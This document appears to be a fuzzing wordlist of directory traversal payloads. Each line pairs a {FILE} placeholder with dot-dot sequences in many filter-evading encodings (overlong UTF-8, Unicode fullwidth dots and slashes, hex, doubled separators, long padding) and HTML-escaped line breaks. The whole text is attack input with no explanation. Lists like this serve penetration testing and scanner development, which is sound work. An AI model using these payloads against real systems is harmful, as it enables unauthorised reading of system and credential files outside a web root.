AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
